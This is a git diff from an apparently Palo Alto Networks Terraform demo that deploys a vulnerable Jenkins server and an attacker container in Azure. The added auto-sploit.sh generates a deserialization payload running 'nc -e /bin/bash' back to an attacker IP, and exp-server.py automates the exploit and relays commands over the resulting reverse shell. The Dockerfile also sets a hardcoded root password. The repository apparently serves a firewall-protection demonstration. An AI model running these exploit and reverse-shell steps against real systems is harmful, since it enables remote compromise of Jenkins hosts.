-wget https://jff-jenkins-attack.s3-us-west-2.amazonaws.com/auto-sploit.sh
-wget https://raw.githubusercontent.com/nembery/terraform-1/master/aws/Jenkins_proj-master/exp-server.py
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml
+wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py
 docker-compose build
-docker-compose up -d
\ No newline at end of file
+docker-compose up -d
diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
index 55324851..bb37c3e5 100644
--- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
+++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
@@ -7,11 +7,11 @@ cd /var/tmp
 echo "version: '3'" > docker-compose.yml
 echo "services:" >> docker-compose.yml
 echo "  jenkins:" >> docker-compose.yml
-echo "    image: pglynn/jenkins:version1.0" >> docker-compose.yml
+echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
 echo "    environment:" >> docker-compose.yml
 echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
 echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
 echo "    ports:" >> docker-compose.yml
 echo "      - \"50000:50000\"" >> docker-compose.yml
 echo "      - \"8080:8080\"" >> docker-compose.yml
-docker-compose up -d
\ No newline at end of file
+docker-compose up -d
diff --git a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh
index afb0acd2..17b352c5 100644
--- a/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh
+++ b/azure/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver1.sh
@@ -4,8 +4,8 @@ apt-get update
 apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 pip3 install docker-compose
 cd /var/tmp
-wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/Dockerfile
-wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/docker-compose.yml
-wget https://jenkins-test-vuln.s3-us-west-2.amazonaws.com/jenkins.sh
+wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile
+wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml
+wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh
 docker-compose build
-docker-compose up -d
\ No newline at end of file
+docker-compose up -d
diff --git a/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars
index bb60d8f1..f56aa41c 100644
--- a/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars
+++ b/azure/Jenkins_proj-master/WebInDeploy/terraform.tfvars
@@ -1,6 +1,6 @@
 Attack_RG_Name = "<Attacker RG Name>"
 
-Azure_Region = "central us"
+Azure_Region = "<Azure Region>"
 
 Admin_Username = "<Admin Username>"
 
@@ -44,4 +44,4 @@ WebLB_IP = "10.0.4.10"
 
 Web_IP = "10.0.4.50"
 
-Attack_IP = "10.1.1.50"
\ No newline at end of file
+Attack_IP = "10.1.1.50"
diff --git a/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
index 6ba878ef..da110808 100644
--- a/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
+++ b/azure/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
@@ -134,7 +134,7 @@ resource "panos_security_policies" "security_policies" {
     hip_profiles          = ["any"]
     destination_zones     = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"]
     destination_addresses = ["any"]
-    applications          = ["web-browsing", "jenkins"]
+    applications          = ["web-browsing", "jenkins", "windows-azure-base"]
     services              = ["service-http", "${panos_service_object.so_81.name}"]
     categories            = ["any"]
     group                 = "Inbound"
@@ -206,4 +206,4 @@ resource "panos_static_route_ipv4" "internal" {
     interface = "${panos_ethernet_interface.eth1_2.name}"
     destination = "${var.Web_Subnet_CIDR}"
     next_hop = "${var.FW_Internal_GW}"
-}
\ No newline at end of file
+}
diff --git a/azure/Jenkins_proj-master/attacker/Dockerfile b/azure/Jenkins_proj-master/attacker/Dockerfile
new file mode 100644
index 00000000..e6123ab4
--- /dev/null
+++ b/azure/Jenkins_proj-master/attacker/Dockerfile
@@ -0,0 +1,42 @@
+FROM openjdk:8-jdk
+
+MAINTAINER jamie-b
+
+RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo python3 python3-pip && rm -rf /var/lib/apt/lists/*
+
+RUN echo 'root:paloalto' | chpasswd
+
+ENV TINI_VERSION v0.14.0
+ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini
+RUN chmod +x /bin/tini
+
+RUN set -ex \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar -O ~/commons-beanutils-1.8.3.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar -O ~/commons-collections-3.2.1.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar -O ~/commons-lang-2.6.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar -O ~/commons-logging-1.2.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar -O ~/ezmorph-1.0.6.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar -O ~/json-lib-2.4-jenkins-2.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/payload.jar -O ~/payload.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/exploit.py -O ~/exploit.py -q --progress=bar:force:noscroll --show-progress
+
+EXPOSE 443 5000
+
+RUN pip3 install requests flask pexpect
+
+COPY run.sh /usr/local/bin/run.sh
+COPY exp-server.py /root/exp-server.py
+
+RUN chmod +x /usr/local/bin/run.sh
+
+COPY auto-sploit.sh /root/auto-sploit.sh
+
+RUN chmod +x /root/auto-sploit.sh
+
+USER root
+
+ENTRYPOINT ["/bin/tini", "--"]
+ENV FLASK_APP=/root/exp-server.py
+
+# CMD ["/usr/local/bin/run.sh"]
+CMD ["/usr/local/bin/flask", "run", "--host=0.0.0.0"]
diff --git a/azure/Jenkins_proj-master/attacker/auto-sploit.sh b/azure/Jenkins_proj-master/attacker/auto-sploit.sh
new file mode 100644
index 00000000..97c6dc3d
--- /dev/null
+++ b/azure/Jenkins_proj-master/attacker/auto-sploit.sh
@@ -0,0 +1,31 @@
+#! /bin/bash 
+
+echo
+echo "*******************************************************************"
+echo
+echo "Open another terminal window and run a netcat listener: nc -lvp 443"
+echo
+echo "Run the following command  to spawn a shell once the reverse connection establishes:"
+echo 
+echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" 
+echo
+read -n 1 -s -r -p "Once the above is complete - press any key to continue"
+
+echo
+echo "Enter Attacker IP Address:"
+echo
+
+read attacker
+
+echo "Creating Payload with IP address" $attacker
+echo
+
+java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" 
+
+echo "Payload successfully created and saved as 'payload.ser'"
+echo 
+
+echo "Executing exploit..."
+echo
+
+python3 exploit.py
diff --git a/azure/Jenkins_proj-master/attacker/docker-compose.yml b/azure/Jenkins_proj-master/attacker/docker-compose.yml
new file mode 100644
index 00000000..02cdb71b
--- /dev/null
+++ b/azure/Jenkins_proj-master/attacker/docker-compose.yml
@@ -0,0 +1,8 @@
+version: '3'
+services:
+  attacker:
+    build: .
+    container_name: attacker
+    ports:
+      - "443:443"
+      - "5000:5000"
diff --git a/azure/Jenkins_proj-master/attacker/exp-server.py b/azure/Jenkins_proj-master/attacker/exp-server.py
new file mode 100644
index 00000000..19a4a77b
--- /dev/null
+++ b/azure/Jenkins_proj-master/attacker/exp-server.py
@@ -0,0 +1,175 @@
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+"""
+Palo Alto Networks - demo-launcher
+Super simple App to expose a RESTful API to launch a couple of scripts
+This software is provided without support, warranty, or guarantee.
+Use at your own risk.
+"""
+
+import pexpect
+from flask import Flask
+from flask import request
+import os
+import time
+
+app = Flask(__name__)
+
+
+@app.route("/")
+def hello():
+    return "Good Day!"
+
+
+@app.route("/launch", methods=['POST'])
+def launch_sploit():
+    """
+    Accepts a JSON payload with the following structure:
+    {
+        "target": "nlb-something.fqdn.com",
+        "attacker": "1.2.3.4"
+    }
+    If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn
+    then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect
+    :return: Simple String response for now
+    """
+    if request.is_json:
+        print(request.data)
+        payload = request.get_json()
+        print(request.mimetype)
+        print(request.content_type)
+        print(request.accept_mimetypes)
+        print(payload)
+        print(type(payload))
+        target_ip = payload.get('target', '')
+        attacker_ip = payload.get('attacker', '')
+        if target_ip == "" or attacker_ip == "":
+            print('Payload is all wrong!')
+            print(request.payload)
+            return 'ERROR'
+
+        exe = '/root/auto-sploit.sh'
+        if not os.path.exists(exe):
+            return 500, 'launch script does not exist'
+
+        print('Launching auto-sploit.sh')
+        child = pexpect.spawn('/root/auto-sploit.sh')
+        child.delaybeforesend = 2
+        found_index = child.expect(['press any key to continue', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print('launching listener process')
+            _launch_listener()
+            child.send('\n')
+        else:
+            return 'ERROR - Could not press key to continue'
+
+        found_index = child.expect(['Enter Attacker IP Address', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print('Sending attacker ip :::' + attacker_ip + ':::')
+            child.sendline(attacker_ip)
+        else:
+            return 'ERROR - Could not enter attacker IP'
+
+        found_index = child.expect(['Enter Jenkins Target IP Address', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print(child.before)
+            print('Sending target ip')
+            child.sendline(target_ip)
+        else:
+            print(child.before)
+            return 'ERROR - Could not enter jenkins IP'
+
+        found_index = child.expect(['pwn', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print('PWN')
+            print(child)
+            time.sleep(2)
+            return 'SUCCESS - auto-sploit launched!'
+
+    else:
+        return 'No Bueno - No JSON payload detected'
+
+
+@app.route("/send", methods=['POST'])
+def send_cmd():
+    if request.is_json:
+        data = request.get_json()
+        cli = data.get('cli', '')
+        if cli == '':
+            return 'No Bueno - Invalid JSON payload'
+
+        if 'listener' in app.config:
+            print('We have a listener already up!')
+            listener = app.config.get('listener', '')
+            if not hasattr(listener, 'isalive') or not listener.isalive():
+                return 'No Bueno - Listener does not appear to be active'
+
+            print('Sending initial command to see where we are!')
+            listener.sendline('echo $SHLVL\n')
+            found_index = listener.expect(['1', 'jenkins@', 'root@', pexpect.EOF, pexpect.TIMEOUT])
+            print(found_index)
+            if found_index == 0:
+                # no prompt yet
+                print('Great, trying to get a prompt now')
+                listener.sendline("python -c 'import pty; pty.spawn(\"/bin/bash\")'")
+
+            if found_index > 2:
+                print(listener.before)
+                return 'Someting is wrong with the listener connection!'
+
+            # listener.sendline(cli)
+            # print(listener)
+            found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT])
+            print('Found index is now: ' + str(found_index))
+            if found_index > 1:
+                print(listener)
+                return 'Someting is wrong with the listener connection!'
+            listener.sendline(cli)
+            found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT])
+            print('Found index after cli is now: ' + str(found_index))
+            if found_index > 1:
+                print(listener)
+                return 'Someting is wrong with the listener connection!'
+            print(listener)
+            return listener.before
+
+        else:
+            return 'NOPE'
+    else:
+        return 'NOWAYJOSE'
+
+
+def _launch_listener():
+    if 'listener' not in app.config:
+        listener = pexpect.spawn('nc -lvp 443')
+        found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index != 0:
+            return False
+        app.config['listener'] = listener
+        print('Launched and ready to rock')
+        return True
+    else:
+        listener = app.config['listener']
+        if hasattr(listener, 'isalive') and listener.isalive():
+            return True
+        else:
+            listener = pexpect.spawn('nc -lvp 443')
+            found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT])
+            if found_index != 0:
+                return False
+            app.config['listener'] = listener
+            return True
+
+
diff --git a/azure/Jenkins_proj-master/attacker/run.sh b/azure/Jenkins_proj-master/attacker/run.sh
new file mode 100644
index 00000000..bc9b9de7
--- /dev/null
+++ b/azure/Jenkins_proj-master/attacker/run.sh
@@ -0,0 +1,11 @@
+#! /bin/bash -e
+
+# Running nc on an unexposed port to keep the container up
+
+if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
+
+  exec nc -l -p 56789 "$@"
+
+fi
+
+exec "$@"
diff --git a/azure/Jenkins_proj-master/azure_login.py b/azure/Jenkins_proj-master/azure_login.py
index b21948f2..bbe85a41 100644
--- a/azure/Jenkins_proj-master/azure_login.py
+++ b/azure/Jenkins_proj-master/azure_login.py
@@ -7,3 +7,4 @@
 print('Logging in to Azure using device code')
 
 get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+pass
\ No newline at end of file
diff --git a/azure/Jenkins_proj-master/deploy-v2.html b/azure/Jenkins_proj-master/deploy-v2.html
new file mode 100644
index 00000000..123a542a
--- /dev/null
+++ b/azure/Jenkins_proj-master/deploy-v2.html
@@ -0,0 +1,185 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<html><head><title>Python: module deploy-v2</title>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+</head><body bgcolor="#f0f0f8">
+
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="heading">
+<tr bgcolor="#7799ee">
+<td valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial">&nbsp;<br><big><big><strong>deploy-v2</strong></big></big></font></td
+><td align=right valign=bottom
+><font color="#ffffff" face="helvetica, arial"><a href=".">index</a><br><a href="file:/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py">/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py</a></font></td></tr></table>
+    <p><tt>#&nbsp;Copyright&nbsp;(c)&nbsp;2018,&nbsp;Palo&nbsp;Alto&nbsp;Networks<br>
+#<br>
+#&nbsp;Permission&nbsp;to&nbsp;use,&nbsp;copy,&nbsp;modify,&nbsp;and/or&nbsp;distribute&nbsp;this&nbsp;software&nbsp;for&nbsp;any<br>
+#&nbsp;purpose&nbsp;with&nbsp;or&nbsp;without&nbsp;fee&nbsp;is&nbsp;hereby&nbsp;granted,&nbsp;provided&nbsp;that&nbsp;the&nbsp;above<br>
+#&nbsp;copyright&nbsp;notice&nbsp;and&nbsp;this&nbsp;permission&nbsp;notice&nbsp;appear&nbsp;in&nbsp;all&nbsp;copies.<br>
+#<br>
+#&nbsp;THE&nbsp;SOFTWARE&nbsp;IS&nbsp;PROVIDED&nbsp;"AS&nbsp;IS"&nbsp;AND&nbsp;THE&nbsp;AUTHOR&nbsp;DISCLAIMS&nbsp;ALL&nbsp;WARRANTIES<br>
+#&nbsp;WITH&nbsp;REGARD&nbsp;TO&nbsp;THIS&nbsp;SOFTWARE&nbsp;INCLUDING&nbsp;ALL&nbsp;IMPLIED&nbsp;WARRANTIES&nbsp;OF<br>
+#&nbsp;MERCHANTABILITY&nbsp;AND&nbsp;FITNESS.&nbsp;IN&nbsp;NO&nbsp;EVENT&nbsp;SHALL&nbsp;THE&nbsp;AUTHOR&nbsp;BE&nbsp;LIABLE&nbsp;FOR<br>
+#&nbsp;ANY&nbsp;SPECIAL,&nbsp;DIRECT,&nbsp;INDIRECT,&nbsp;OR&nbsp;CONSEQUENTIAL&nbsp;DAMAGES&nbsp;OR&nbsp;ANY&nbsp;DAMAGES<br>
+#&nbsp;WHATSOEVER&nbsp;RESULTING&nbsp;FROM&nbsp;LOSS&nbsp;OF&nbsp;USE,&nbsp;DATA&nbsp;OR&nbsp;PROFITS,&nbsp;WHETHER&nbsp;IN&nbsp;AN<br>
+#&nbsp;ACTION&nbsp;OF&nbsp;CONTRACT,&nbsp;NEGLIGENCE&nbsp;OR&nbsp;OTHER&nbsp;TORTIOUS&nbsp;ACTION,&nbsp;ARISING&nbsp;OUT&nbsp;OF<br>
+#&nbsp;OR&nbsp;IN&nbsp;CONNECTION&nbsp;WITH&nbsp;THE&nbsp;USE&nbsp;OR&nbsp;PERFORMANCE&nbsp;OF&nbsp;THIS&nbsp;SOFTWARE.<br>
+&nbsp;<br>
+#&nbsp;Author:&nbsp;Justin&nbsp;Harris&nbsp;jharris@paloaltonetworks.com<br>
+&nbsp;<br>
+Usage<br>
+&nbsp;<br>
+python&nbsp;deploy.py&nbsp;-u&nbsp;&lt;fwusername&gt;&nbsp;-p&lt;fwpassword&gt;&nbsp;-r&lt;resource&nbsp;group&gt;&nbsp;-j&lt;region&gt;</tt></p>
+<p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#aa55cc">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Modules</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#aa55cc"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><table width="100%" summary="list"><tr><td width="25%" valign=top><a href="xml.etree.ElementTree.html">xml.etree.ElementTree</a><br>
+<a href="argparse.html">argparse</a><br>
+<a href="pandevice.firewall.html">pandevice.firewall</a><br>
+<a href="json.html">json</a><br>
+</td><td width="25%" valign=top><a href="logging.html">logging</a><br>
+<a href="os.html">os</a><br>
+<a href="requests.html">requests</a><br>
+<a href="subprocess.html">subprocess</a><br>
+</td><td width="25%" valign=top><a href="sys.html">sys</a><br>
+<a href="time.html">time</a><br>
+<a href="urllib3.html">urllib3</a><br>
+<a href="uuid.html">uuid</a><br>
+</td><td width="25%" valign=top><a href="xmltodict.html">xmltodict</a><br>
+</td></tr></table></td></tr></table><p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#ee77aa">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Classes</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#ee77aa"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><dl>
+<dt><font face="helvetica, arial"><a href="builtins.html#Exception">builtins.Exception</a>(<a href="builtins.html#BaseException">builtins.BaseException</a>)
+</font></dt><dd>
+<dl>
+<dt><font face="helvetica, arial"><a href="deploy-v2.html#DeployRequestException">DeployRequestException</a>
+</font></dt></dl>
+</dd>
+</dl>
+ <p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#ffc8d8">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#000000" face="helvetica, arial"><a name="DeployRequestException">class <strong>DeployRequestException</strong></a>(<a href="builtins.html#Exception">builtins.Exception</a>)</font></td></tr>
+    
+<tr bgcolor="#ffc8d8"><td rowspan=2><tt>&nbsp;&nbsp;&nbsp;</tt></td>
+<td colspan=2><tt>Common&nbsp;base&nbsp;class&nbsp;for&nbsp;all&nbsp;non-exit&nbsp;exceptions.<br>&nbsp;</tt></td></tr>
+<tr><td>&nbsp;</td>
+<td width="100%"><dl><dt>Method resolution order:</dt>
+<dd><a href="deploy-v2.html#DeployRequestException">DeployRequestException</a></dd>
+<dd><a href="builtins.html#Exception">builtins.Exception</a></dd>
+<dd><a href="builtins.html#BaseException">builtins.BaseException</a></dd>
+<dd><a href="builtins.html#object">builtins.object</a></dd>
+</dl>
+<hr>
+Data descriptors defined here:<br>
+<dl><dt><strong>__weakref__</strong></dt>
+<dd><tt>list&nbsp;of&nbsp;weak&nbsp;references&nbsp;to&nbsp;the&nbsp;object&nbsp;(if&nbsp;defined)</tt></dd>
+</dl>
+<hr>
+Methods inherited from <a href="builtins.html#Exception">builtins.Exception</a>:<br>
+<dl><dt><a name="DeployRequestException-__init__"><strong>__init__</strong></a>(self, /, *args, **kwargs)</dt><dd><tt>Initialize&nbsp;self.&nbsp;&nbsp;See&nbsp;help(type(self))&nbsp;for&nbsp;accurate&nbsp;signature.</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__new__"><strong>__new__</strong></a>(*args, **kwargs)<font color="#909090"><font face="helvetica, arial"> from <a href="builtins.html#type">builtins.type</a></font></font></dt><dd><tt>Create&nbsp;and&nbsp;return&nbsp;a&nbsp;new&nbsp;object.&nbsp;&nbsp;See&nbsp;help(type)&nbsp;for&nbsp;accurate&nbsp;signature.</tt></dd></dl>
+
+<hr>
+Methods inherited from <a href="builtins.html#BaseException">builtins.BaseException</a>:<br>
+<dl><dt><a name="DeployRequestException-__delattr__"><strong>__delattr__</strong></a>(self, name, /)</dt><dd><tt>Implement&nbsp;delattr(self,&nbsp;name).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__getattribute__"><strong>__getattribute__</strong></a>(self, name, /)</dt><dd><tt>Return&nbsp;getattr(self,&nbsp;name).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__reduce__"><strong>__reduce__</strong></a>(...)</dt><dd><tt>helper&nbsp;for&nbsp;pickle</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__repr__"><strong>__repr__</strong></a>(self, /)</dt><dd><tt>Return&nbsp;repr(self).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__setattr__"><strong>__setattr__</strong></a>(self, name, value, /)</dt><dd><tt>Implement&nbsp;setattr(self,&nbsp;name,&nbsp;value).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__setstate__"><strong>__setstate__</strong></a>(...)</dt></dl>
+
+<dl><dt><a name="DeployRequestException-__str__"><strong>__str__</strong></a>(self, /)</dt><dd><tt>Return&nbsp;str(self).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-with_traceback"><strong>with_traceback</strong></a>(...)</dt><dd><tt><a href="builtins.html#Exception">Exception</a>.<a href="#DeployRequestException-with_traceback">with_traceback</a>(tb)&nbsp;--<br>
+set&nbsp;self.<strong>__traceback__</strong>&nbsp;to&nbsp;tb&nbsp;and&nbsp;return&nbsp;self.</tt></dd></dl>
+
+<hr>
+Data descriptors inherited from <a href="builtins.html#BaseException">builtins.BaseException</a>:<br>
+<dl><dt><strong>__cause__</strong></dt>
+<dd><tt>exception&nbsp;cause</tt></dd>
+</dl>
+<dl><dt><strong>__context__</strong></dt>
+<dd><tt>exception&nbsp;context</tt></dd>
+</dl>
+<dl><dt><strong>__dict__</strong></dt>
+</dl>
+<dl><dt><strong>__suppress_context__</strong></dt>
+</dl>
+<dl><dt><strong>__traceback__</strong></dt>
+</dl>
+<dl><dt><strong>args</strong></dt>
+</dl>
+</td></tr></table></td></tr></table><p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#eeaa77">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Functions</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#eeaa77"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><dl><dt><a name="-apply_tf"><strong>apply_tf</strong></a>(working_dir, vars, description)</dt><dd><tt>Handles&nbsp;terraform&nbsp;operations&nbsp;and&nbsp;returns&nbsp;variables&nbsp;in&nbsp;outputs.tf&nbsp;as&nbsp;a&nbsp;dict.<br>
+:param&nbsp;working_dir:&nbsp;Directory&nbsp;that&nbsp;contains&nbsp;the&nbsp;tf&nbsp;files<br>
+:param&nbsp;vars:&nbsp;Additional&nbsp;variables&nbsp;passed&nbsp;in&nbsp;to&nbsp;override&nbsp;defaults&nbsp;equivalent&nbsp;to&nbsp;-var<br>
+:param&nbsp;description:&nbsp;Description&nbsp;of&nbsp;the&nbsp;deployment&nbsp;for&nbsp;logging&nbsp;purposes<br>
+:return:&nbsp;&nbsp;&nbsp;&nbsp;return_code&nbsp;-&nbsp;0&nbsp;for&nbsp;success&nbsp;or&nbsp;other&nbsp;for&nbsp;failure<br>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;outputs&nbsp;-&nbsp;Dictionary&nbsp;of&nbsp;the&nbsp;terraform&nbsp;outputs&nbsp;defined&nbsp;in&nbsp;the&nbsp;outputs.tf&nbsp;file</tt></dd></dl>
+ <dl><dt><a name="-create_azure_fileshare"><strong>create_azure_fileshare</strong></a>(share_prefix, account_name, account_key)</dt><dd><tt>Generate&nbsp;a&nbsp;unique&nbsp;share&nbsp;name&nbsp;to&nbsp;avoid&nbsp;overlaps&nbsp;in&nbsp;shared&nbsp;infra<br>
+:param&nbsp;share_prefix:<br>
+:param&nbsp;account_name:<br>
+:param&nbsp;account_key:<br>
+:return:</tt></dd></dl>
+ <dl><dt><a name="-getApiKey"><strong>getApiKey</strong></a>(hostname, username, password)</dt><dd><tt>Generates&nbsp;a&nbsp;Paloaltonetworks&nbsp;api&nbsp;key&nbsp;from&nbsp;username&nbsp;and&nbsp;password&nbsp;credentials<br>
+:param&nbsp;hostname:&nbsp;Ip&nbsp;address&nbsp;of&nbsp;firewall<br>
+:param&nbsp;username:<br>
+:param&nbsp;password:<br>
+:return:&nbsp;api_key&nbsp;API&nbsp;key&nbsp;for&nbsp;firewall</tt></dd></dl>
+ <dl><dt><a name="-getFirewallStatus"><strong>getFirewallStatus</strong></a>(fwIP, api_key)</dt></dl>
+ <dl><dt><a name="-getServerStatus"><strong>getServerStatus</strong></a>(IP)</dt><dd><tt>Gets&nbsp;the&nbsp;server&nbsp;status&nbsp;by&nbsp;sending&nbsp;an&nbsp;HTTP&nbsp;request&nbsp;and&nbsp;checking&nbsp;for&nbsp;a&nbsp;200&nbsp;response&nbsp;code</tt></dd></dl>
+ <dl><dt><a name="-main"><strong>main</strong></a>(username, password, rg_name, azure_region)</dt><dd><tt>Main&nbsp;function<br>
+:param&nbsp;username:<br>
+:param&nbsp;password:<br>
+:param&nbsp;rg_name:&nbsp;Resource&nbsp;group&nbsp;name&nbsp;prefix<br>
+:param&nbsp;azure_region:&nbsp;Region<br>
+:return:</tt></dd></dl>
+ <dl><dt><a name="-send_request"><strong>send_request</strong></a>(call)</dt><dd><tt>Handles&nbsp;sending&nbsp;requests&nbsp;to&nbsp;API<br>
+:param&nbsp;call:&nbsp;url<br>
+:return:&nbsp;Retruns&nbsp;result&nbsp;of&nbsp;call.&nbsp;Will&nbsp;return&nbsp;response&nbsp;for&nbsp;codes&nbsp;between&nbsp;200&nbsp;and&nbsp;400.<br>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;200&nbsp;response&nbsp;code&nbsp;is&nbsp;required&nbsp;check&nbsp;value&nbsp;in&nbsp;response</tt></dd></dl>
+ <dl><dt><a name="-update_fw"><strong>update_fw</strong></a>(fwMgtIP, api_key)</dt><dd><tt>Applies&nbsp;latest&nbsp;AppID,&nbsp;Threat&nbsp;and&nbsp;AV&nbsp;updates&nbsp;to&nbsp;firewall&nbsp;after&nbsp;launch<br>
+:param&nbsp;fwMgtIP:&nbsp;Firewall&nbsp;management&nbsp;IP<br>
+:param&nbsp;api_key:&nbsp;API&nbsp;key</tt></dd></dl>
